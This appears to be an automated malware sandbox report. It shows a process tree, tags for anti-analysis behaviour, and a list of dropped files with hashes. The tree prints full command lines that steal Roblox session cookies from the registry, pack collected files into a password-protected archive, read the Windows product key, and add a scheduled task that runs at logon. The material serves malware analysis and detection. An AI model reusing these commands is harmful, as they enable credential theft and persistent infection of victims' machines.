                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:8160
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                            12⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:1556
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:6492
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:5432
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\VAuoE.zip" *"
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:6124
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\VAuoE.zip" *
                                                                                                                                                                                  12⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:7188
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:512
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic os get Caption
                                                                                                                                                                                    12⤵
                                                                                                                                                                                      PID:7232
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:7200
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:1508
                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                          wmic computersystem get totalphysicalmemory
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:5568
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:5640
                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                              wmic csproduct get uuid
                                                                                                                                                                                              12⤵
                                                                                                                                                                                                PID:7400
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:7424
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:2020
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:5992
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                    PID:5952
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:5772
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2c8776.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2c8776.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:4928
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1620
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:4016
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1612
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:5096
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:5268
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Wihnup" /tr '"C:\Users\Admin\AppData\Roaming\Wihnup.exe"' & exit
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:6740
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Wihnup" /tr '"C:\Users\Admin\AppData\Roaming\Wihnup.exe"'
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:2356
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC04D.tmp.bat""
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:7012
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout 3
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:2028
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Wihnup.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Wihnup.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:3180
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4928 -ip 4928
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3156
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4928 -ip 4928
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3508
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4452 -ip 4452
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1800
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4452 -ip 4452
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2400
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4728 -ip 4728
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2468
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4728 -ip 4728
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3504
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:2976
                                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6688
                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:7072
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3432
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:6728

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\based.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      7.4MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e44859239d2a93c07af5cc6c8534c7d4

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      a6f1f1de254303c16d375c35c40ab97441d217cf

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      84d5e59326950909d8082f7de5df61db9451632445a9868d45bbfb5692e4da4e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      6844e7dc296bf2c576d0471882374d6e3079568468f879630c0421803143bb08fe549b193a0d0ae3769d88272e1c820ee1d6e5e3f6d41ffb768ad3c85e731836

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\hacn.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      15.9MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      25c9646884948e295c48b44b5f6b36e3

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      d7d1eff99524c1329bb2fe30d3c5fb68083bf2d2

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      32974029d6fbfec03976f7bf9f2772adaf2a605ba55374a94c0486701b44b342

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      6321cca4f5708078779f6873605d2728bab74eb01e2edd4a9208cffbdb65564ae7c8401442c08097388c505e1d53427e2de5d56239e76a3389aa8d60a4edffa6

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      649B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      b068a6d243736412ea2bf3dc1a3e2148

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      124858115f9aa273600b66a1cfdcd0f5e5bea57d

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      98ea5e9ee820e78b76380a0736263742d0784645deced80b1457cdc98c83c236

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      83bf5d990b6e54f606950e9c8146358c1e16150fb297a772365560e774318c473d80a9feebdd8dbf53957909779af8f765ab5dadb24fc240efd7e1e951013647

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      264B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      706b612e66782ccf86a3e969f304c88b

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0c0b8b2e8f6ef5cf81cb627e4f76f6acfd3d0dcf

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      80b4a34c09353886ee68ed6a6f4cbe2892500fd4e80bc20e9f5b69651c0e091a

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7ccd58edf4b30fdbbde8c5f13ea2210316c1bd8d9fef89028328cc08ce9ea1f9ca9b6ed27a85afe49fc35bebdf8f74a482d9af2809fab42a5422a399e3bbe531

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      851B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      854B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      356B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      8e6d737f47d0b9bc0b083b63d90b48cd

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      42684c018a44968e922d1cc2c7555b882738465a

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      feb9014828778d6e851c1c2fffb68bcce7d3c3bd93f34bb837d53b1a68478590

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8b4c17e5a8cb0bf8c623246b08c1fd7013e3520493735d6bbdf0556c00de2bf7c99c447a38e8ce7b98cf1fc7e2e863ae25eaccd8744993efce02b2dfc77cdaf9

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      499e5b5ace5cbf2655090e0ab39be0c3

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0621db11f3414aa3d3beff5b438f401cb8fd42a6

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      c9b528be80b1797639e5ca943098b996103af7fda0016df10bb593b9c5f2ef92

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      45a96ff09222a2eaad80d18cefefa8ac166753ad6841777d38648af27b375f1790594a78a15e697612009d1459c483182cfdfa8b11356a71d49f330a13deff85

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      94bd07a38f418db1ac5d5b5ff1db7ccc

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      91e156ec59dcd8c9e57ea1bb905cf350275e3069

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      0433190d7bde7e4c33a56431857a183a82a7eb0e91ce3ae0d969cd6837c0aa03

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      cda853f7985c999b6eb201f1ac222ed001e8a1f8aa8c50355886a5d116be2720799bed1fa86dd7d7839e43e46fdc21611f64368787deff0b2191d210a7e1eb9d

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e838b9eeda64d504763404c2fe4a41e2

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      e0294941338b4b2d8cf018ef988a253e749834b9

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      cef3544593d34ce4c4a296b395dc435243d83a6f96f94020487f0e0827ec2367

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      16e845d9aca3c4978bc10623ef202b2788edf8059a119bccf955163b22bece50b69dd75e6f3e6eb3867f402b5694d121131a7dacce0c314e4122d18f9b67167e

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      aaa17c6cb061056cb17ccd809667b603

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      decd9cdefd8d51a308254d7c01c443a46ec6a5ff

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      2f4f2e9e7a533b9c255c1534287640848441329a0d20833eea7522b629d0634a

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      6e115079be78597fe07f10084194448959d79bc6fb84ac387cc16fafd7c30640c5303c16cb2972f274bc269a813930255a31fc83832cc1b9c877f02e164e6055

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      15KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e36257385664c0d64dc815f41a2d313c

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      2135b2d36d1e2d56f46c8a600c6290758053ef63

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      daa97c7362df65195109a6a2b45bf185076a8ea08d072d68b6418bcd7bbf93f6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      e6f927a3ec160ebbc2d15de1f9e4d61c7dda16606ae875499f12dc246a5aa3e8d00f2a17eed44ac756f223e551df159b99ddb76ce7a9d2a62da023095d6c9aba

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      72B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d8b3a01ae4e637beab211992612d6ba3

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      cb617b58daf0ec8fec76a8d5347cb9268ca04784

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      23cbfff96f38c388fa08c85aec0156ac718e9a28ebb14b79860b224c2462f020

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      2b9a4602a6d4b7cafd39ca4c9effed056a5ec0abb6599a5edbac03e82149c0ae8d5d0e936c6b7d16c3ef2c47835c3c7dd456ca618eaef5aff60c8fe888c7e3ad

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      231KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      c431a2efaf0c766f8e2f052fdb5b4e49

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      246886b0aad22fe250cd4945ea43dfc3d885bf0d

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      49749efc33a359af79fc737da20e130a8cb68dc9fc34c52b568aca831207bb96

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      1a443e28a4535de26e55ef56eaf505ad5397d3bbd873f069a786cd8530aa0918e8c4821fa5294677d1cc3c58761bd7c62e14076d38f17f04c9b5d510948d42fa

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      231KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      f217553f37586453b98bc1b7e255745a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      bbd1ee5c50a2fa7f7c542320d647cae8bdd7d6da

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      bf9cf2e780c861cdd11493b71a6843714e9bbdcb667306f245aaad56c6ebba01

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      08584e4c5231466cec5214d1307db382d4d6d440992c18c4bcf0f3cb93b0f1e17edae2f5fa7414bd697e0bcb88df55a001d0232a93e7ca2861b165d4814c5c41

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      152B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      443a627d539ca4eab732bad0cbe7332b

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      86b18b906a1acd2a22f4b2c78ac3564c394a9569

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      152B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      99afa4934d1e3c56bbce114b356e8a99

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      38KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      7585ee2361dd21811a7212b8a48f7ea6

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      751533f834fb740a2623344bfb062e36003f5d3b

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      a8a480b713d2b97955778e3eb7b6b61223f27788db4199ac0c03b211c0666055

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7a567a01a12f67bc8d0726083fbd1a2cecf8b7cfaccc22f181ffd2fa4e8192a8b1bd0961bddd29060d2640f659eea9b1a0f492c4a99ab7e14a97f2b3ec9c72aa

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      240B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      dddba7249549904133bfce6ccff016b5

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0bc0c52a437c7202902f04550811e86003dce2a7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      7c1fbce66f94c601c132aa0f64de9fbbe9b839b5e39a229fe9d20e121d162b66

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7a8c38a9d9927c4faa3648ad82274a2c31a3a19e5f175f0e8c78a5529db08840c7566162226a92a2dde3f0e11d7258a47164796b4d7b439435bb859686cb07b1

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      6KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      a63ff00067e61d6006c2a25db5822aae

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      561b1325c08e660808ebf96e7a5ab776ae8a7d35

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      07ee420b66b4b2029c06876bb17c795e2474df6a31741c6bf2df5c808e8b7585

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      aad425847d161db65ccdd47e8f933ee2d65514d3592ae409f740b487146e32f415373f12b57f349627d3a27bb608512d47e85121c874f095203a564e985991aa

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      84aeafc7ef8cca9f6777e529da738308

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      83c422f1da10d610a6cad1c580613fc939eb3336

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      c1cf396d454ab4b84be051b3837b5e55497eb7e3903f4f821cd2e8ee145c9d5b

                                                                                                                                                                                                      SHA512

